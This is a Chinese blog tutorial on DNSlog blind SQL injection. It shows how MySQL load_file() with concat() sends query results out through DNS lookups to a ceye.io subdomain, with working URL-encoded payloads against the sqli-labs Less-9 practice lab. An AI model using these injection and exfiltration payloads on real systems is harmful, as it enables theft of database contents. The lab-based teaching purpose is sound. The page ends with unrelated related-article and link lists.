Dnslog盲注原理

布尔盲注和时间盲注相当于猜单词的游戏,我们需要对每一位逐步的猜测,效率很低,需要发送很多的请求进行判断,很可能会触发安全设备的防护
我们需要一种方式能够减少请求,直接回显数据——Dnslog注入
Dns在解析的时候会留下日志,通过读取多级域名的解析日志,获取请求信息

Dnslog盲注方法

登录http://ceye.io/网站并注册,得到属于自己的identifier
先尝试在终端运行curl dnslog.4ke30o.ceye.io

Mysql load_file()函数可以发起请求,LOAD_FILE()函数操作需要用户具有FILE权限
构造语句,利用load_file()函数发起请求,使用Dnslog接收请求,获取数据
只能在windows系统下使用load_file()发起请求,在Linux环境下不能使用load_file()发起请求
使用语句select load_file(concat('\\\\',(select version()),'.mysql.4ke30o.ceye.io\\abc'))
在使用前务必记得设置secure_file_priv为"",我使用的是PHPstudy集成环境,所以访问http://localhost/phpMyAdmin4.8.5/来使用SQL




重启mysql服务

使用语句,查询自己想要的数据,此处查询版本信息


以第九关为例(在windows上运行)
使用http://localhost/sqli-labs-master/index.html进入SQLInjection页面

http://localhost/sqli-labs-master/Less-9/?id=1%27%20and%20(select%20load_file(concat(%27\\\\%27,(select%20version()),%27.mysql.4ke30o.ceye.io\\abc%27)))--+
  • 1
http://localhost/sqli-labs-master/Less-9/?id=1%27%20and%20(select%20load_file(concat(%27\\\\%27,(select%20schema_name%20from%20information_schema.schemata%20limit%201,1),%27.mysql.4ke30o.ceye.io\\abc%27)))--+
  • 1

一般来说,查询不到就说明语法有问题,可以先在mysql中尝试,在url中务必记得
1、?id=1’ and
2、and后面的语句要用括号括起来
3、不要忘记注释掉后面的语句–+或者%23

</article>

dnslog盲注原理相关推荐

  1. 编解码注入、二次注入、DNSlog盲注

    1.编解码注入 靶场 sqlilabs-Less21 登录后,使用bp抓包 分析源码: 发现,如果正确登录,就会设置一个cookie,并且使用base64编码 分析cookie: 发现此处可以进行co ...

  2. mysql dba盲注_SQL注入学习-Dnslog盲注

    1.基础知识 1.DNS DNS(Domain Name System,域名系统),因特网上作为域名和IP地址相互映射的一个分布式数据库,能够使用户更方便的访问互联网,而不用去记住能够被机器直接读取的 ...

  3. 布尔盲注怎么用,一看你就明白了。布尔盲注原理+步骤+实战教程

    「作者主页」:士别三日wyx 「作者简介」:CSDN top100.阿里云博客专家.华为云享专家.网络安全领域优质创作者 「专栏简介」:此文章已录入专栏<网络安全快速入门> 布尔盲注 一. ...

  4. SQL注入-盲注-时间注入-报错注入-布尔盲注-DNSlog注入-宽字节注入-WAF绕过-SqlMap使用

    Sqli-labs的安装 1.安装WAMP http://www.wampserver.com/ WAMP是php + mysql + Apache环境集成工具 2.下载Sqli-labs https ...

  5. sql盲注特点_SQL注入第二章——access,mssql,oracle

    一.Access注入 Access是轻量级数据库,特点是没有库,没有用户,单文件即可存储数据,在SQL注入时必须猜测表名和列名. Access只有联合注入和布尔盲注. 1,联合注入 http://12 ...

  6. sql注入学习——布尔盲注

    前言:之前通过前九关学习到了回显注入.报错注入等一些方法,这次就来详细的学习布尔盲注. 首先来了解一下盲注的概念 盲注是注入的一种,指的是在不知道数据库返回值的情况下对数据中的内容进行猜测,实施SQL ...

  7. SQL注入进阶:掌握布尔盲注和延时注入攻击技巧

    数据来源 一.什么是盲注? 盲注是指一种利用应用程序漏洞进行的攻击技术,攻击者通过在输入参数中注入恶意代码或数据来探测.提取和修改应用程序的敏感数据.它通常用于测试 Web 应用程序的安全性,并且可能 ...

  8. 【SQL注入漏洞-04】布尔盲注靶场实战

    布尔盲注 当我们改变前端页面传输给后台sql参数时,页面没有显示相应内容也没有显示报错信息时,不能使用联合查询注入和报错注入,这时我们可以考虑是否为基于布尔的盲注. 布尔盲注原理: 利用页面返回的布尔 ...

  9. json里面的list数据取不出来_sql盲注的困局:利用DNSlog快速导出数据

    对于一个sql注入点来说最幸运的就是支持堆叠注入,最蛋疼的就是盲注,盲注里面难搞的就是基于时间的盲注. 我们在本地利用这段代码进行演示 <?php error_reporting(0); $li ...

最新文章

  1. javacurrentmap_Java集合---ConcurrentHashMap原理分析
  2. AD数据采集的“数字滤波”:10个“软件滤波程序”
  3. 如何给a标签绑定ajax事件
  4. Java线程详解(17)-原子量
  5. Mybatis+mysql动态分页查询数据案例——条件类(HouseCondition)
  6. 【正在等待可用套接字】解决方法
  7. MS08067安全培训讲师(高薪、专兼职)
  8. python裁剪图片边缘模糊_用cv2模糊部分图像后的锐利边缘
  9. WordPress 网站怎么做会员中心功能【会员中心】
  10. Orkut 也遭到 XSS 攻击,18 万用户受影响
  11. Android 银联控件支付开发流程
  12. Kindle 转换器
  13. CP2K代码分析一:CP2K主程序
  14. 解决mysql的配置文件my.ini不起作用
  15. 2012年2月4日汇报Axure RP Pro 6.5 Beta简体中文加强测试版进展
  16. 关于ie浏览器的插件IEDevToolBar 安装问题
  17. Java项目:酒店宾馆管理系统(java+SpringBoot+html+layui+jQuery+maven+mysql)
  18. hive学习(5)--- Partitions分区的使用(包括动态分区)
  19. 从“天地一体”到“移动组网”,中国量子通信产业是如何“炼成”的?
  20. 你知道cosmic吗

热门文章

  1. 【NBIoT无线模块DTU数传电台】串口服务器RS232/RS485端口工业路由信号传输
  2. 别克gl8服务器返回数据为空,老司机教学:别克GL8商务车总线控制系统故障解决...
  3. 国计算机学会聘为全国青少年信,中国计算机学会将继续开展NOI相关活动,暂未作出重新申报的决议...
  4. .net Reactor之exe、dll文件混淆
  5. 用JS写的取存款功能
  6. python之字符串连接
  7. Ulink2 No Ulink Device found 解决办法
  8. XP退役对整个互联网安全的问题
  9. Eclipse快捷键以及设置
  10. 产生的DLL (VS2005, MATLAB7.5, mwArray)